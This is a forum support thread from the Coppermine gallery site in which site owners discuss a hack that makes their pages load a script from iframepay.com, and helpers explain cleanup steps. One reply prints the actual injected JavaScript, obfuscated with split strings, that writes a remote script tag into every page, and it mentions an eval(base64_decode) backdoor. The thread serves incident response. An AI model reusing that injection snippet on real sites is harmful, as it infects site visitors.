forum.coppermine-gallery.net

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: evdr on October 12, 2010, 12:11:00 pm

Title: Strange link tries to load with page: iframepay.com.....
Post by: evdr on October 12, 2010, 12:11:00 pm
Since a few days, our photo location (media.fraternitas.nl) has serious performance problems;
Because I'm not known with coppermine (someone else installed coppermine, but I cant reach him anymore), It's hard for me to locate this issue.
After some search, I noticed that with loading the pages, it also tries to make contact with an strange url: iframepay.com.
Some search done where iframepay.com comes from; looks like a Russian "service" for enhancing extra visitors to your site.
Can't remember it has been installed or whatever did something with that site.

Looking in the copperime source-code (as far as I canunderstand), but nothing found.

Is someone known with above?

Is an upgrade to the latest version of Coppermine a solution??

Title: Re: Strange link tries to load with page: iframepay.com.....
Post by: Nibbler on October 12, 2010, 04:24:29 pm
Your gallery was hacked due to failure to apply security updates. See http://forum.coppermine-gallery.net/index.php/topic,51927.0.html
Title: Re: Strange link tries to load with page: iframepay.com.....
Post by: evdr on October 12, 2010, 05:28:19 pm
Thnx for your quick respons.
I think the best option is to upgrade to 1.5.8.
Title: Re: Strange link tries to load with page: iframepay.com.....
Post by: user3657 on October 21, 2010, 11:35:47 am
I have the same issue. I had no idea what happened, untill I googled iframepxx.

I read the posted link, and that seems to advance for me. I read the doc on how to upgrade. If I just do an upgrade, will that take care of it? I have 1.4.10 and want to upgrade to 1.4.27 which is the newest stable release.

anyone know if this will work?
Title: Re: Strange link tries to load with page: iframepay.com.....
Post by: Brooklyn on October 21, 2010, 11:47:00 am
Updating is not enough in most cases. You'll need to apply all steps contained within the above link. The reason is simple: updating protects you from currently known vulnerabilities and attack, but doesn't do very much if your infection has spread outside your Coppermine directory -- which it quite probably has. Therefore, solely updating without performing the related tasks could leave attack programs running on your server and re-infect you at-will. It's almost impossible for us to know how widespread your infection is, and since you don't have the technical background to visually verify, it's in your best interest to follow each step outlined above.

Simply put, cleaning your gallery is not enough, and might be useless if you don't take care of the remainder of your web space.

If you need assistance, we're here to help.
Title: Re: Strange link tries to load with page: iframepay.com.....
Post by: user3657 on October 25, 2010, 03:45:10 am
Updating is not enough in most cases. You'll need to apply all steps contained within the above link. The reason is simple: updating protects you from currently known vulnerabilities and attack, but doesn't do very much if your infection has spread outside your Coppermine directory -- which it quite probably has. Therefore, solely updating without performing the related tasks could leave attack programs running on your server and re-infect you at-will. It's almost impossible for us to know how widespread your infection is, and since you don't have the technical background to visually verify, it's in your best interest to follow each step outlined above.

Simply put, cleaning your gallery is not enough, and might be useless if you don't take care of the remainder of your web space.

If you need assistance, we're here to help.

What if I do the upgrade first. I would be ok if the update fixes the issue. But if it doesnt, and I need to follow the steps to clean it manual, being I did the upgrade first would that affect anything?
Title: Re: Strange link tries to load with page: iframepay.com.....
Post by: nivis on November 02, 2010, 08:25:41 am

The problem is that the config has been altered and you have a setting in your config table ( for me it was cpg145_config ), custom_header_path and custom_footer_path that points to a file that injects this code into your pages:

Code: [Select]
<script language="JavaScript">
var ifpc_id = "12582";
var ifpc_url = document.location;
var ifpc_rnd = Math.random();
document.write('<scr'+'ipt type="text/javascript" src="http://ifr'+'amepay.'+'com/t'+'ds/js.p'+'hp"></scr'+'ipt>');
</script>

Solution:

First of all upgrade to a newer version.

Remove the custom_header_path, custom_footer_path in your database:

Code: [Select]

mysql> update cpg145_config set value = '' where name = 'custom_header_path';
Query OK, 0 rows affected (0.00 sec)
Rows matched: 1  Changed: 0  Warnings: 0

mysql> update cpg145_config set value = '' where name = 'custom_footer_path';
Query OK, 0 rows affected (0.00 sec)
Rows matched: 1  Changed: 0  Warnings: 0

mysql>

It is important that you check the files you copy from your old installation to make sure thats there's no malicious code in them. For instance, my /path/to/include/config.inc.php had an eval(base64_decode) statement in the header of the file.
 
Title: Re: Strange link tries to load with page: iframepay.com.....
Post by: user3657 on December 25, 2010, 08:35:27 am
just to update this thread, i just got around to playing.....i found another thread about this, in which the infected site found a .zip file under and "hidden" in albums/userpics/10001. I run 2003 and noticed an extra folder in my inetpub dir. it was ftpacess, i found it strage because i never noticed this. nothing was inside so i deleted it. I remembered the date it was modified. I made my way to albums/userpics/10001 and found a .jpg that that was made on the same date as this wired ftpaccess folder. I deleted this .jpg, and sure enough my site loaded super fast without trying to access iframepay. easy enough. I dont think my site is secure, but I have no idea about permissions. how can I prevent this from happening again?